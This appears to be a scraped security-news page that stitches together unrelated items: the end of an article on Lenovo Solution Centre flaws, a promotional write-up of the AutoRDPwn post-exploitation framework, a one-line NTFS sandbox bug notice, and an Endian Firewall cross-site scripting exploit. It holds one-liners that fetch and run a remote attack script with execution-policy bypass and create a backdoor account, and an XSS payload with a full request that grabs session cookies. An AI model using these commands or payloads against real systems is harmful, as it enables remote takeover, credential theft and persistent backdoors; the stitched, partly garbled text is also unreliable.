Lenovo, the software was originally released in 2011. Lenovo said LSC been “officially” designated end of life since November 2018. However, a version is still available for download via the Lenovo website. Lenovo’s LSC software has been a source of many headaches for Lenovo. In 2016, researchers found a similar escalation of privileges bug. In 2015, the hacking group Slipstream/RoL demonstrated a proof-of-concept attack that exploited a LSC bug allowed a malicious web page to execute code on Lenovo PCs with system privileges. The LSC security flaw is the most recent in a long list of security fumbles that have plagued Lenovo over the past year. In February 2015, Lenovo was put in the security hot seat when researchers discovered a piece of software called Superfish that injected ads on websites and could be abused by hackers to read encrypted passwords and web-browsing data. Last August, Lenovo again landed in hot water when it was criticized for automatically downloading Lenovo Service Engine software – labeled as unwanted bloatware by many. Worse, when users removed the software Lenovo systems were configured to download and reinstall the program without the PC owner’s consent. Interested in more on the internet of things (IoT)? Don’t miss our free Threatpost webinar, “IoT: Implementing Security in a 5G World.” Please join Threatpost senior editor Tara Seals and a panel of experts as they offer enterprises and other organizations insight about how to approach security for the next wave of IoT deployments, which will be enabled by the rollout of 5G networks worldwide. Click here to register.

Source

image
AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on-demand, using tools native to the operating system itself. Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages. Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section. Requirements Powershell 4.0 or higher Changes Version 5.0 • New logo completely redesigned from scratch • Full translation in 7 languages: es, en, fr, de, it, ru, pt • Remote execution through a reverse shell with UAC and AMSI Bypass • Partial support from Linux (more information in the user guide) • Improved remote execution (internet connection is no longer necessary on the victim) • New section available: Backdoors and persistence • New module available: Remote Keylogger • New section available: Privilege escalation • New module available: Obtain information from the operating system • New module available: Search vulnerabilities with Sherlock • New module available: Escalate privileges with PowerUp • New section available: Other Modules • New module available: Execute an external script *The rest of the changes can be consulted in the CHANGELOG file Use This application can be used locally, remotely or to pivot between teams. When used remotely in a reverse shell, it is necessary to use the following parameters: -admin / -noadmin -> Depending on the permissions we have, we will use one or the other -nogui -> This will avoid loading the menu and some colors, guaranteed its functionality -lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese) -option -> As with the menu, we can choose how to launch the attack -shadow -> We will decide if we want to see or control the remote device -createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine Local execution on one line: powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .AutoRDPwn.ps1” Example of remote execution on a line: powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser” The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva Screenshots Credits and Acknowledgments This framework uses the following scripts and tools: • Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools • Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell • Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts • Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload • Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m • Invoke-PowerShellTcp of Nikhil “SamratAshok” Mittal -> https://github.com/samratashok/nishang • Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash • Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz • PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec • RDP Wrapper of Stas’M Corp. -> https://github.com/stascorp/rdpwrap • SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher And many more, that do not fit here .. Thanks to all of them and their excellent work. Contact This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it. For more information, you can contact through [email protected] Download AutoRDPwn

The NTFS driver supports a new FS control code to set a mount point which the existing sandbox mitigation doesn’t support allowing a sandboxed application to set an arbitrary mount point symbolic link.

MD5 | 0943b5ee8bb525ed81875df4a3ae481f

Source

Endian Firewall version 3.3.0 suffers from a cross site scripting vulnerability.

MD5 | 2dc274d1f115293fb370ca32fa329935

# Exploit Title: Endian Firewall cross-site scripting (XSS)
# Date: 08/22/2019
# Exploit Authors: Milad Soltanian + G0dfather ( @irpwn )
# Vendor Homepage: https://www.endian.com
# Version : 3.3.0

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.



1 - login

2 - open the url below to edit network configuration

3 - forward the step till u face Step 3/8: Network preferences

4 - now put the payload in IP address input

[PAYLOAD] = "><!--




[EXAMPLE REQUESTE]

POST /cgi-bin/netwizard.cgi HTTP/1.1
Host: 5.9.96.86:10443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Authorization: Basic YWRtaW46bWEhQCM0NTY=
Connection: close
Referer: https://192.168.1.10:10443/cgi-bin/netwizard.cgi
Cookie: en-visit=216e4cac7868d0ca041c21489faa817d1a8faca5; session_id=2fcdb768fee725b270598427fa6f4ed10f6774ca; endian_webshell=354369204
Upgrade-Insecure-Requests: 1

session_id=174960656&step=3&DHCP_ENABLE_GREEN=on&DISPLAY_GREEN_ADDRESS=%22%3E%3Cimg+src%3DaWd3l+onerror%3Dalert%28document.cookie%29%3E%3C%21--&DISPLAY_GREEN_NETMASK=24&DISPLAY_GREEN_ADDITIONAL=&GREEN_DEVICES=0&HOSTNAME=efw-82aabd1d48&DOMAINNAME=localdomain&next=%3E%3E%3E

Source